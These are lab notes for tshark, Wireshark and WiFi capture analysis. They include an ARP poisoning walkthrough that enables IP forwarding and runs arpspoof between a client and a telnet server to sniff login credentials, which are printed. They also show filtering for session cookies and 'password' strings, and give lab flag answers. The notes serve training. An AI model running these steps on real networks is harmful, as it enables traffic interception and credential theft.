Skip to content

Latest commit

 

History

History
459 lines (274 loc) · 10.9 KB

tshark-arp.md

File metadata and controls

459 lines (274 loc) · 10.9 KB

🔬Tshark, ARP, WiFi

Lab 1

🔬 Getting Started: Tshark

  • Tshark usage
tshark -v
TShark (Wireshark) 2.6.1 (Git v2.6.1 packaged as 2.6.1-0ubuntu2~16.04.0)

📌 Running Tshark version is 2.6.1

tshark -D
  • These are all supported network interfaces for monitoring

tshark -D

  • Sniff some traffic on eth0
tshark -i eth0

tshark -i eth0

📌 student user don't have permission to capture on eth0 interface

  • Display the packet list of the .pcap file
tshark -r HTTP_traffic.pcap
  • Count .pcap file number of lines to find total number of packets
tshark -r HTTP_traffic.pcap | wc -l
	30418 # lines in the file

tshark -r HTTP_traffic.pcap

  • Read first 100 packets from the .pcap file
tshark -r HTTP_traffic.pcap -c 100
  • List the Protocol Hierarchy Statistics from the .pcap file
tshark -r HTTP_traffic.pcap -z io,phs -q

tshark -r HTTP_traffic.pcap -z io,phs -q

Lab 2

🔬 Filtering Basics: HTTP

  • Tshark usage and filtering

Filtering

  • Show the HTTP traffic from a .pcap file
tshark -r HTTP_traffic.pcap -Y 'http'
tshark -r HTTP_traffic.pcap -Y 'http' | more

tshark -r HTTP_traffic.pcap -Y 'http'

  • Show only the IP packets sent from IP address 192.168.252.128 to IP address 52.32.74.91
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"

tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"

  • Print only packets containing GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"

tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"

  • Print only packets with frame time, source IP and URL for all GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri

tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri

  • Print packets containing a string
tshark -r HTTP_traffic.pcap -Y "http contains password"

tshark -r HTTP_traffic.pcap -Y "http contains password"

📌 4 HTTP packets contain the password string

  • Check the destination IP for GET requests sent to www.nytimes.com
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst

tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst

📌 170.149.159.130 is the destination IP of www.nytimes.com

  • Check the session ID used by 192.168.252.128 for amazon.in
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie

tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie

📌 278-7381968-4337153 is the session ID

  • Find the OS type on the machine with IP 192.168.252.128
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent

tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent

  • Use the User_agent string to find the specific distribution

Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0

📌 The OS is Linux x86_64; rv:31.0 - user-agents.net

Lab 3 - ARP Poisoning

🔬 INE Platform Lab

  • ARP Poisoning attack to a telnet server
    • the client machine authenticates with the telnet server every 30sec
  • Find the telnet login credentials
  • Tools: arpspoof & Wireshark
  • Monitor the traffic on eth1 interface of the Kali Attacker machine.
ip -br -c a
	eth1  UP  10.100.13.140/24

Enumeration

nmap 10.100.13.0/24
Nmap scan report for 10.100.13.1
    22/tcp   open  ssh
    3389/tcp open  ms-wbt-server
# ^^ Gateway machine, do not attack

Nmap scan report for 10.100.13.36
    22/tcp open  ssh
    23/tcp open  telnet
# ^^ Telnet server machine

Nmap scan report for 10.100.13.140
    3389/tcp open  ms-wbt-server
    5910/tcp open  cm
# ^^ Client machine

nmap 10.100.13.0/24

ARP Poisoning Attack

  • To see traffic of other machines, configure Kali Attacker VM to forward IP packets
echo 1 > /proc/sys/net/ipv4/ip_forward
  • Start the ARP poisoning attack with the arpspoof tool
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
# -t = target
# -r = host
  • Open Wireshark and start capture eth1 traffic
    • Apply telnet filter

  • Follow the TCP stream and find the telnet credentials
    • Stop the capture and the arpspoof tool

📌 Telnet credentials are admin:MyS3cr3tP455

telnet 10.100.13.36

Lab 4 - WiFi Traffic Analysis

🔬 WiFi Security: Traffic Analysis I

  • WiFi basic traffic analysis with Wireshark
  • Find the name of the Open SSID in the packet dump, using the filter
    • Beacon frame = 0x0008
    • Wlan tag 48 = RSN-IE (Robust Security Network Information Element)
(wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) &&
!(wlan.tag.number == 48)

Reveal Flag - The name of the Open SSID is: 🚩

SecurityTube_Open

  • Find the channel Home_Network is operating
wlan contains Home_Network

Reveal Flag - Home_Network operates on channel: 🚩

6

  • Find which security mechanism has LazyArtists SSID
wlan contains LazyArtists

Reveal Flag - LazyArtists configured security is: 🚩

WPA2-PSK

  • Check the WPS setup for Amazon Wood SSID
(wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008)

📌 WPS is enabled

  • Count the packets of the device with MAC e8:de:27:16:87:18
    • wlan.ta = transmitted
    • wlan.ra = received
(wlan.ta == e8:de:27:16:87:18)  ||  (wlan.ra == e8:de:27:16:87:18)

Reveal Flag - Total packets number is: 🚩

5701

  • Find a specific MAC address which exchange data with SecurityTube_Open SSID
    • SecurityTube_Open is hosted on BSSID e8:de:27:16:87:18
(wlan.bssid == e8:de:27:16:87:18) && (wlan.fc.type_subtype == 0x0020)

Reveal Flag - The MAC address is: 🚩

5c:51:88:31:a0:3b

  • Find TSF timestamp of the Association Response sent from the SecurityTube_Open access point to a station
((wlan.bssid == e8:de:27:16:87:18) && (wlan.addr==5c:51:88:31:a0:3b)) &&
(wlan.fc.type_subtype == 0x0001)

Reveal Flag - The TSF timestamp is: 🚩

115152625

Lab 5 - WiFi Traffic Filtering

🔬 Filtering Advanced: WiFi

  • Tshark usage and filtering
  • Show only WiFi traffic
tshark -r WiFi_traffic.pcap -Y "wlan"

tshark -r WiFi_traffic.pcap -Y "wlan" | more

  • Show only the deauthentication packets
    • Every management frame in WiFi has can be classified under a type and subtype
    • wlan.fc.type_subtype == 0x000c - AP sends deauthentication frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"

tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"

  • Show only the WPA handshake packets
    • EAPoL (Extensible Authentication Protocol over LAN) is used for WPA handshake
tshark -r WiFi_traffic.pcap -Y "eapol"

tshark -r WiFi_traffic.pcap -Y "eapol"

  • Show only SSID and BSSID values of all beacon frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid

tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid

  • Check the BSSID of LazyArtists SSID
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid

tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid

📌 LazyArtists BSSID is fc:b0:c4:91:71:e0.

  • Show the channel on which Home_Network operates
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel

tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel

📌 Home_Network operating channel is 6.

  • Show the two devices that received the deauth messages
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra

tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra

📌 The MAC address of the two devices are 6c:19:8f:5f:81:74 and bc:ae:c5:c3:5e:01.

  • Check vendor and model of the device with MAC 5c:51:88:31:a0:3b
tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent

tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent

📌 The device is a Motorola MotoG3.